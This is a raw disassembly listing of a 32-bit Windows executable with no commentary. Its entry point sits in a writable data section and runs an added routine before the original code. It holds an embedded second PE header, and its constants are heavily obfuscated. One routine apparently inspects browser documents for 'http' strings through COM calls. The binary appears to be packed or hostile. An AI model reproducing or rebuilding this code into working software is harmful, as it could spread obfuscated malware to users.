; sub_403997+65�w ...
align 10h
dword_4072A0 dd 3 dup(0) ; DATA XREF: sub_403997+123�o
; sub_403997+171�o ...
dword_4072AC dd 0 ; DATA XREF: sub_403997+108�w
; sub_403997+15D�w ...
dd 4 dup(0)
byte_4072C0 db 0 ; DATA XREF: sub_403BD6:loc_403CE2�w
; sub_403BD6:loc_403CFF�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4073C0 db 0 ; DATA XREF: sub_403997+5C�o
; sub_403997+AF�o ...
byte_4073C1 db 0 ; DATA XREF: sub_402FE1+3F�r
; sub_402FE1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4074C4 dd 0 ; DATA XREF: sub_403997+6E�w
; sub_403997+12B�w ...
dword_4074C8 dd 320000h ; DATA XREF: sub_403472+19�w
; sub_403472+29�r ...
dd 5 dup(0)
dword_4074E0 dd 0E80EF0h ; DATA XREF: sub_4032C7:loc_4032E7�w
; sub_4032C7+45�r ...
dword_4074E4 dd 3Fh dup(0) ; DATA XREF: sub_4032C7+92�o
dword_4075E0 dd 20h ; DATA XREF: sub_4032C7+26�w
; sub_4032C7:loc_403351�r ...
dword_4075E4 dd 1 ; DATA XREF: sub_402E8F+AD�w
dword_4075E8 dd 1 ; DATA XREF: sub_402E37�r sub_402E8F+3�r ...
dword_4075EC dd 0 ; DATA XREF: sub_402C00+3E�r
dword_4075F0 dd 0 ; DATA XREF: sub_402C00+35�r
; sub_402C00+57�r
dword_4075F4 dd 0 ; DATA XREF: sub_402BB1�r
dword_4075F8 dd 452340h ; DATA XREF: sub_40292E+7A�w
; sub_402E37+F�r ...
align 1000h
_text ends
; Section 3. (virtual address 00018000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 00018000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 418000h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_44083E
popa
jmp sub_40292E
start endp
; ---------------------------------------------------------------------------
db 0
byte_41800D db 0Dh, 77h, 90h ; DATA XREF: .bss:off_449610�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 6A31BC00h, 0C2AD9923h, 788EE73Ch, 598CC9BEh
dd 0A2552135h, 7B13D24Fh, 572DF9D9h, 7E681E5Dh, 0BE1842C9h
dd 576F5E4Dh, 0B2271DCCh, 949BEC0Ch, 0B1F4B2F2h, 649C421Bh
dd 757BE2FAh, 2A55F560h, 282113h, 6014C00h, 7587C100h
dd 46h, 0
dd 0E00E000h, 2010B21h, 0B20037h, 360000h, 5C0000h, 119600h
dd 100000h, 0D00000h, 0
dd 100010h, 20000h, 100h, 0
dd 400h, 0
dd 1900000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 1800000h, 4C00h, 1500000h, 1CC00h, 6 dup(0)
dd 1600000h, 148800h, 14h dup(0)
dd 65742E00h, 7478h, 0B03C00h, 100000h, 0B03C00h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 5BD800h, 0D00000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 1B7800h, 1300000h, 1B7800h
dd 0B60000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 1CC00h, 1500000h, 1CC00h
dd 0D20000h, 3 dup(0)
dd 6000h, 65722EC0h, 636F6Ch, 149000h, 1600000h, 149000h
dd 0D60000h, 3 dup(0)
dd 2000h, 64652E02h, 617461h, 4C00h, 1800000h, 4C00h, 0EC0000h
dd 3 dup(0)
dd 2000h, 40h, 65h dup(0)
dd 1B800h, 31C30000h, 4C8B40C0h, 41F70424h, 604h, 8B0F7400h
dd 8B082444h, 89102454h, 3B802h
db 2 dup(0), 0C3h
; =============== S U B R O U T I N E =======================================
sub_418433 proc near ; CODE XREF: .data:0041855B�p
; .data:00418589�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001006h
push large dword ptr fs:0
mov large fs:0, esp
loc_418450: ; CODE XREF: sub_418433+44�j
; sub_418433+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41847F
cmp esi, [esp+1Ch+arg_4]
jz short loc_41847F
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_418450
call dword ptr [ebx+esi*4+8]
jmp short loc_418450
; ---------------------------------------------------------------------------
loc_41847F: ; CODE XREF: sub_418433+2A�j
; sub_418433+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_418433 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41848D proc near ; CODE XREF: .data:0041854E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001098h
push [ebp+arg_0]
call sub_4233DD
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41848D endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_418582
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4184E0: ; CODE XREF: .data:00418579�j
cmp esi, 0FFFFFFFFh
jz loc_418591
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_418570
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10013034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10013038h, eax
mov eax, [edx+4]
mov ds:1001303Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10013040h
mov esi, ds:10013038h
rep movsd
lea edi, ds:10013040h
mov ds:10013038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_418570
js short loc_41857E
mov edi, [ebx+8]
push ebx
call sub_41848D
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_418433
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_418570: ; CODE XREF: .data:004184F1�j
; .data:00418546�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4184E0
; ---------------------------------------------------------------------------
loc_41857E: ; CODE XREF: .data:00418548�j
xor eax, eax
jmp short loc_41859B
; ---------------------------------------------------------------------------
loc_418582: ; CODE XREF: .data:004184C5�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_418433
add esp, 0Ch
loc_418591: ; CODE XREF: .data:004184E3�j
push 0Bh
call sub_423425
add esp, 4
loc_41859B: ; CODE XREF: .data:00418580�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_4185B4
call sub_4185D0
loc_4185B4: ; CODE XREF: .data:004185AD�j
call sub_423368
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10013000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185D0 proc near ; CODE XREF: .data:004185AF�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_4233F5
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_4233F5
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_4233F5
mov [ebp+var_C], eax
push 1001301Eh
push [ebp+var_8]
call sub_4233E9
mov ds:10013008h, eax
push 1001301Ch
push [ebp+var_4]
call sub_4233E9
mov ds:10013004h, eax
push 1001301Ch
push [ebp+var_C]
call sub_4233E9
add esp, 30h
mov ds:1001300Ch, eax
mov edi, ds:10013004h
or edi, edi
jz short loc_418649
push 0
push edi
call sub_423431
add esp, 8
loc_418649: ; CODE XREF: sub_4185D0+6C�j
mov edi, ds:1001300Ch
or edi, edi
jz short loc_418663
push 0
push edi
call sub_423431
add esp, 8
call sub_418669
loc_418663: ; CODE XREF: sub_4185D0+81�j
pop edi
leave
retn
sub_4185D0 endp
; ---------------------------------------------------------------------------
dw 9090h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418669 proc near ; CODE XREF: sub_4185D0+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_4233D1
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_4186A1
; ---------------------------------------------------------------------------
loc_418685: ; CODE XREF: sub_418669+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_41868D
inc [ebp+var_C]
loc_41868D: ; CODE XREF: sub_418669+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_4186A1: ; CODE XREF: sub_418669+1A�j
cmp byte ptr [ebx], 0
jnz short loc_418685
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_423419
pop ecx
mov [ebp+var_8], eax
mov ds:10013010h, eax
cmp [ebp+var_8], 0
jnz short loc_4186CF
xor eax, eax
jmp short loc_41872C
; ---------------------------------------------------------------------------
loc_4186CF: ; CODE XREF: sub_418669+60�j
mov ebx, [ebp+var_10]
jmp short loc_418719
; ---------------------------------------------------------------------------
loc_4186D4: ; CODE XREF: sub_418669+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_418713
push [ebp+var_4]
call sub_423419
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_418701
jmp short loc_41872C
; ---------------------------------------------------------------------------
loc_418701: ; CODE XREF: sub_418669+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_42343D
add esp, 8
add [ebp+var_8], 4
loc_418713: ; CODE XREF: sub_418669+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_418719: ; CODE XREF: sub_418669+69�j
cmp byte ptr [ebx], 0
jnz short loc_4186D4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_41872C: ; CODE XREF: sub_418669+64�j
; sub_418669+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_418669 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418731 proc near ; CODE XREF: sub_41C6CD+C1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
movsx eax, word ptr ds:100131F0h
add eax, ds:10013284h
sub eax, 0Ch
push eax
push [ebp+arg_0]
call dword ptr ds:10011634h
pop ebp
retn
sub_418731 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418755 proc near ; CODE XREF: sub_41B354+1A4�p
; sub_41B354+259�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word ptr ds:100131FCh
add eax, ds:10013108h
sub eax, 0Bh
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_418893
; ---------------------------------------------------------------------------
loc_418789: ; CODE XREF: sub_418755+146�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, ds:100133B8h[edx]
mov eax, ds:10013090h
movsx edx, word ptr ds:100130E0h
add eax, edx
sub eax, 3
neg eax
cmp esi, eax
jz loc_418892
mov eax, [ebp+var_8]
or eax, eax
jl loc_41888F
cmp eax, 3
jg loc_41888F
jmp dword ptr ds:100137B8h[eax*4]
; ---------------------------------------------------------------------------
dd 0E9F845FFh, 0BBh, 8BF4558Bh, 131580Dh, 0A80D0310h, 83100130h
dd 0D0890DE9h, 4589E0D3h, 83F289E8h, 0D8B30E2h, 10013278h
dd 7005BF0Fh, 1100131h, 0D3D089C1h, 0E8558BF8h, 5588C209h
dd 43D889F3h, 88F3558Ah, 0F845FF10h, 558B75EBh, 0FE283F4h
dd 0A40DBF0Fh, 83100131h, 0D08903E9h, 4589E0D3h, 83F289E4h
dd 0D8B3CE2h, 10013134h, 8906E983h, 8BF8D3D0h, 0C209E455h
dd 89F35588h, 558A43D8h, 0FF1088F3h, 37EBF845h, 83F4558Bh
dd 0BF0F03E2h, 132080Dh, 0D0894110h, 0C289E0D3h, 5588F209h
dd 43D889F3h, 88F3558Ah, 5BF0F10h, 10013144h, 0DC15BF0Fh
dd 1100131h, 7E883D0h
db 89h, 45h, 0F8h
; ---------------------------------------------------------------------------
loc_41888F: ; CODE XREF: sub_418755+61�j
; sub_418755+6A�j
mov [ebp+var_C], esi
loc_418892: ; CODE XREF: sub_418755+56�j
inc edi
loc_418893: ; CODE XREF: sub_418755+2F�j
cmp byte ptr [edi], 0
jz short loc_4188A1
cmp ebx, [ebp+var_4]
jb loc_418789
loc_4188A1: ; CODE XREF: sub_418755+141�j
cmp byte ptr [edi], 0
jnz short loc_4188AD
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_4188BD
; ---------------------------------------------------------------------------
loc_4188AD: ; CODE XREF: sub_418755+14F�j
mov eax, ds:100130E4h
add eax, ds:10013090h
sub eax, 0Bh
neg eax
loc_4188BD: ; CODE XREF: sub_418755+156�j
pop edi
pop esi
pop ebx
leave
retn
sub_418755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188C2 proc near ; CODE XREF: sub_418999+68A�p
; sub_4197BE+EF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4188D7: ; CODE XREF: sub_4188C2+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4188D7
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_4188E9: ; CODE XREF: sub_4188C2+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4188E9
mov esi, eax
movsx eax, word ptr ds:10013118h
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_41895A
; ---------------------------------------------------------------------------
loc_418901: ; CODE XREF: sub_4188C2+9E�j
mov eax, ds:10013184h
movsx edx, word ptr ds:10013100h
mov ebx, eax
add ebx, edx
sub ebx, 5
mov eax, ds:100131C8h
mov edi, eax
add edi, ds:1001313Ch
sub edi, 3
jmp short loc_418953
; ---------------------------------------------------------------------------
loc_418926: ; CODE XREF: sub_4188C2+93�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_418957
inc ebx
cmp ebx, esi
jnz short loc_418952
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_418952
mov eax, [ebp+var_4]
jmp short loc_418967
; ---------------------------------------------------------------------------
loc_418952: ; CODE XREF: sub_4188C2+7E�j
; sub_4188C2+89�j
inc edi
loc_418953: ; CODE XREF: sub_4188C2+62�j
cmp edi, esi
jb short loc_418926
loc_418957: ; CODE XREF: sub_4188C2+79�j
inc [ebp+var_4]
loc_41895A: ; CODE XREF: sub_4188C2+3D�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_418901
mov eax, 0FFFFh
loc_418967: ; CODE XREF: sub_4188C2+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_4188C2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41896F: ; CODE XREF: .data:00418993�j
call sub_41C480
mov eax, ds:1001318Ch
add eax, 2
mov edx, ds:10013280h
add edx, 0EA5Ch
imul eax, edx
push eax
call dword ptr ds:10012630h
pop ecx
jmp short loc_41896F
; ---------------------------------------------------------------------------
db 5Dh, 0C2h, 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418999 proc near ; CODE XREF: .data:0042131E�p
var_71F10 = dword ptr -71F10h
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF9 = byte ptr -70EF9h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50E9D = byte ptr -50E9Dh
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_423379
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call dword ptr ds:1000D038h
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
movsx eax, word ptr ds:1001316Ch
movsx edx, word ptr ds:10013180h
add eax, edx
sub eax, 5
push eax
push [ebp+arg_0]
call dword ptr ds:10010254h
mov ebx, eax
movsx eax, word ptr ds:100130C0h
movsx edx, word ptr ds:100131B4h
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_419762
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push 10014AD8h
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:1001326Ch
sub eax, 9
cmp ebx, eax
jnz loc_419762
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, ds:10013224h
sub eax, 5
cmp ebx, eax
jnz loc_419756
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_41C841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call dword ptr ds:10012BA0h
cmp [ebp+var_40E57], 68h
jnz short loc_418AB4
cmp [ebp+var_40E56], 74h
jnz short loc_418AB4
cmp [ebp+var_40E55], 74h
jnz short loc_418AB4
cmp [ebp+var_40E54], 70h
jz short loc_418AB9
loc_418AB4: ; CODE XREF: sub_418999+FE�j
; sub_418999+107�j ...
jmp loc_419756
; ---------------------------------------------------------------------------
loc_418AB9: ; CODE XREF: sub_418999+119�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, ds:10013204h
add eax, ds:100130DCh
sub eax, 4
cmp ebx, eax
jz short loc_418AEA
and [ebp+var_30E4C], 0
loc_418AEA: ; CODE XREF: sub_418999+148�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, ds:1001328Ch
add eax, ds:10013274h
sub eax, 7
cmp ebx, eax
jnz loc_419756
lea eax, [ebp+var_40E6C]
push eax
push 10014A58h
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013268h
sub eax, 4
cmp ebx, eax
jnz loc_41974A
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, ds:10013204h
dec eax
cmp ebx, eax
jnz loc_41973E
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word ptr ds:10013170h
sub eax, 2
cmp ebx, eax
jnz loc_419732
mov eax, ds:10013128h
sub eax, 8
neg eax
mov [ebp+var_40E5C], eax
push 100149A0h
call sub_41FB74
push eax
call dword ptr ds:1000D044h
mov [ebp+var_30E44], eax
push 10014990h
call sub_41FB74
add esp, 8
push eax
call dword ptr ds:1000D044h
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_423399
loc_418BE1: ; CODE XREF: sub_418999+D6D�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
mov eax, ds:10013194h
sub eax, 8
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_418C4C
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:100131D0h
add eax, ds:10013284h
sub eax, 10h
cmp ebx, eax
jnz loc_4196F4
push 10014981h
call sub_41C914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
add esp, 0Ch
jmp loc_418D54
; ---------------------------------------------------------------------------
loc_418C4C: ; CODE XREF: sub_418999+266�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push 10014AA8h
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100131E8h
dec eax
cmp ebx, eax
jnz loc_4196F4
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, ds:100130B4h
sub eax, 8
cmp ebx, eax
jz short loc_418CE1
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_4196F4
; ---------------------------------------------------------------------------
loc_418CE1: ; CODE XREF: sub_418999+335�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:1001321Ch
sub eax, 8
cmp ebx, eax
jz short loc_418D1F
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_4196F4
; ---------------------------------------------------------------------------
loc_418D1F: ; CODE XREF: sub_418999+367�j
push 10014972h
call sub_41C914
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
add esp, 18h
loc_418D54: ; CODE XREF: sub_418999+2AE�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:10013268h
sub eax, 4
cmp ebx, eax
jnz loc_4196F4
movsx eax, word ptr ds:10013240h
movsx edx, word ptr ds:100130CCh
add eax, edx
sub eax, 9
mov [ebp+var_30E50], eax
jmp loc_4196E2
; ---------------------------------------------------------------------------
loc_418D97: ; CODE XREF: sub_418999+D55�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word ptr ds:100130C0h
mov edx, ds:1001314Ch
sub edx, 6
mov [ebp+eax+var_50E9D], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word ptr ds:10013180h
sub eax, 4
cmp ebx, eax
jnz loc_4196DC
push 10014964h
call sub_41C914
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push 10014A78h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013224h
sub eax, 5
cmp ebx, eax
jnz loc_419361
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
cmp ebx, ds:10013138h
jnz loc_419355
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_41C841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call dword ptr ds:10012BA0h
movsx eax, word ptr ds:10013230h
sub eax, 6
mov [ebp+var_40E9C], eax
jmp short loc_418F24
; ---------------------------------------------------------------------------
loc_418ED8: ; CODE XREF: sub_418999+597�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word ptr ds:10013104h
add edx, 5
